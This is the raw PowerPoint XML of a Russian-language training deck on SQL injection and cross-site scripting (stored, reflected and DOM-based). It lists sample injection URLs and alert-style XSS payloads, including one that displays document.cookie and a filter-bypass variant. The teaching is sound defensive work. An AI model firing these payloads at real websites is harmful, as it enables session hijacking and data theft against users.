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61" r:id="rId3"/>
    <p:sldId id="263" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260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2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5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ld.code.mu/sql/distinc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ru/?detail=4+OR+1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://test.ru/?detail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st.ru/?detail=4+UNION+SELECT+" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://test.ru/?detail=4+--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164386"/>
            <a:ext cx="7072777" cy="232196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SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" b="1" dirty="0"/>
              <a:t>инъекция</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t> — это один из самых доступных способов взлома сайта.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3432900"/>
            <a:ext cx="6400800" cy="1947333"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"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Суть таких инъекций – внедрение в данные (передаваемые через GET, POST запросы или значения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) произвольного SQL кода. Если сайт уязвим и выполняет такие инъекции, то по сути есть возможность творить с БД (чаще всего это </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) что угодно.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558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358" y="48896"/>
            <a:ext cx="8534400" cy="1507067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XSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>уязвимость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62971" y="1555963"/>
            <a:ext cx="6944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XSS (англ. Cross-Site Scripting — «межсайтовый </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>скриптинг</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>») — довольно распространенная </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>уязвимость</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, которую можно обнаружить на множестве веб-приложений. Ее суть довольно проста, злоумышленнику удается внедрить на страницу JavaScript-код, который не был предусмотрен разработчиками. Этот код будет выполняться каждый раз, когда жертвы (обычные пользователи) будут заходить на страницу приложения, куда этот код был добавлен.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501" y="1555963"/>
            <a:ext cx="4823605" cy="248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5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455" y="-125764"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Как устроена уязвимость?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06" y="853427"/>
            <a:ext cx="8293460" cy="460282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68455" y="5548718"/>
            <a:ext cx="11316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ru-RU" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ожно 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</a:rPr>
              <a:t>добавить JavaScript-код в поле ввода, текст из которого сохраняется и в дальнейшем отображается на странице для всех пользователей. Это может быть поле для ввода информации о себе на странице профиля социальной сети или комментарии на форуме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924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1" y="685800"/>
            <a:ext cx="9435833" cy="47492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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Типы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Цель </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS-атаки всегда заключается в выполнении </a:t>
            </a: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ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>вредоносного </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript скрипта в браузере жертвы. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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XSS-атаки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>часто </a:t>
            </a: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ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>подразделяются </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>на три типа:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Хранимые (постоянные) XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, где вредоносная строка берет свое начало из базы данных веб-сайта.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Отражённые (непостоянные) XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, где вредоносная строка порождается из запроса жертвы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM-модели XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, где уязвимость возникает в коде на стороне клиента, а не на стороне серверного кода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24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419" y="236305"/>
            <a:ext cx="101405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Где искать XSS? Как с ней бороться? </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRP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В первую очередь стоит проверять на XSS-уязвимости те места на сайте, в которых у обычного пользователя есть возможность повлиять на контент. Если он может добавить в какое-то место определенный текст, он сможет попытаться добавить и JavaScript-код.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Давайте это рассмотрим на конкретном примере.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595901" y="2876764"/>
            <a:ext cx="1253447" cy="523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08848" y="2959226"/>
            <a:ext cx="4681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https://playground.learnqa.ru/demo/xss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81026" y="3697547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&lt;script&gt;alert(123)&lt;/script&gt;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595900" y="3595064"/>
            <a:ext cx="1697273" cy="680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in search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93173" y="4435868"/>
            <a:ext cx="470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&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&lt;/script&gt;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570465" y="4313456"/>
            <a:ext cx="1646715" cy="613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in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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7193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904127"/>
            <a:ext cx="5593298" cy="1294544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Скрипт выполняется на стороне жертвы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Скрипт </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>не размещен на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>сайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" cap="non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212" y="359596"/>
            <a:ext cx="11038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Reflected XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0"/>
              <a:t>Отраженные атаки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0"/>
              <a:t>также иногда называют </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>непостоянным</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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4212" y="2198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Непостоянный XSS имеет место, когда данные, предоставляемые Web-клиентов в строке запроса или HTML форме, используются для генерации ответа клиенту без обработки этих данных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863026" y="3847538"/>
            <a:ext cx="1335641" cy="46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14337" y="3893906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&lt;script&gt;alert("It is my xss ")&lt;/script&gt;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414337" y="4653299"/>
            <a:ext cx="4862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 smtClean="0"/>
              <a:t>sc&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("It is my xss ")&lt;/script&gt;</a:t>
            </a:r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863027" y="5332871"/>
            <a:ext cx="1335641" cy="46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414337" y="5332871"/>
            <a:ext cx="5365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&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=x onMouseOver = alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("It is my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xss”)&gt;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863026" y="4653299"/>
            <a:ext cx="1335641" cy="46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932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207" y="1397285"/>
            <a:ext cx="9267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Хранимый XSS возможен, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML формате </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>без</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1" smtClean="0"/>
              <a:t>фильтров</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" smtClean="0"/>
              <a:t>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2207" y="390418"/>
            <a:ext cx="4294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Stored XSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0"/>
              <a:t>Хранимый XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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406" y="3250152"/>
            <a:ext cx="4078577" cy="499915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1222625" y="3195263"/>
            <a:ext cx="1479478" cy="55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1222625" y="3974387"/>
            <a:ext cx="1479478" cy="55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medium</a:t>
            </a:r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1222625" y="4970979"/>
            <a:ext cx="1479478" cy="55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862993" y="4067123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&lt;script&gt;alert("It is my xss ")&lt;/script&gt;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526230" y="5063715"/>
            <a:ext cx="5365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&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=x onMouseOver = alert("It is my xss”)&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304974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196" y="0"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM-Based XSS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1195" y="1207536"/>
            <a:ext cx="105762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XSS в DOM-модели возникает на стороне клиента во время обработки данных внутри JavaScript-сценария. Данный тип XSS получил такое название, поскольку реализуется через DOM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Document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) — не зависящий от платформы и языка программный интерфейс, позволяющий программам и сценариям получать доступ к содержимому HTML и XML-документов, а также изменять содержимое, структуру и оформление таких документов. При некорректной фильтрации возможно модифицировать DOM атакуемого сайта и добиться выполнения JavaScript-кода в контексте атакуемого сайта.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="807838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0100" y="636522"/>
            <a:ext cx="8534400" cy="3615267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sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Какое влияние оказывает XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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b="1" dirty="0" smtClean="0"/>
              <a:t>Злоумышленник</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>, использующий уязвимость межсайтового скриптинга, обычно может</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Выдавать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>себя за пользователя-жертву или маскироваться под </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>него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Взломать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>сеанс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>пользователя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Совершать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>несанкционированные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>действия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Украсть </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>конфиденциальную </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>информацию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Захватите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>учетные данные пользователя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Захват </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>нажатий </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>клавиш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Внедрить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>на сайт функции трояна.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60" y="4613926"/>
            <a:ext cx="6681795" cy="60965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462322" y="5351772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&lt;/select&gt;&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert("SS")&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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823560" y="5259036"/>
            <a:ext cx="1479478" cy="55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medium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823560" y="6029219"/>
            <a:ext cx="1479478" cy="55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462322" y="6121955"/>
            <a:ext cx="3387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#&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script&gt;alert('XSS');&lt;/script&gt;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422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359596"/>
            <a:ext cx="10494070" cy="5634804"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Различные исследования и исследования показали, что до 50% веб-сайтов уязвимы для уязвимости DSS Based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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algn="ctr" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Фильтры </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>на стороне сервера не имеют значения</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Одно из самых больших различий между уязвимостями XSS на основе DOM и Reflected или Stored XSS заключается в том, что XSS на основе DOM не может быть остановлено серверными фильтрами. Причина довольно проста; все, что написано после </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>«#» (hash)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, никогда не будет отправлено на сервер.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Так сложилось исторически что </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, введенный для простой прокрутки HTML-страницы до определенного элемента, впоследствии стал использоваться разработчиками JavaScript на страницах с AJAX для отслеживания страниц и различных других вещей, и в основном стал называться </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> «#!»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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Благодаря такому дизайну ничего после хеша не будет отправлено на сервер. Это означает, что вся защита на стороне сервера в коде не будет работать для уязвимостей DSS Based XSS. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145056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663" y="213283"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>UNION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3708" y="1602768"/>
            <a:ext cx="70275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ru-RU" dirty="0" smtClean="0"/>
              <a:t>Команда</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>объединяет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>данные из </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>нескольких </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>таблиц в одну при выборке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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>При объединении количество столбцов во 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ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>всех </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>таблицах должно совпадать, иначе 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ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>будет ошибка</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Имена столбцов </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>будут такие же, как в </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>основной </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>таблице, в которую добавляются </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>данные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>из других таблиц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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Внимание:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> если не используется ключевое слово </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
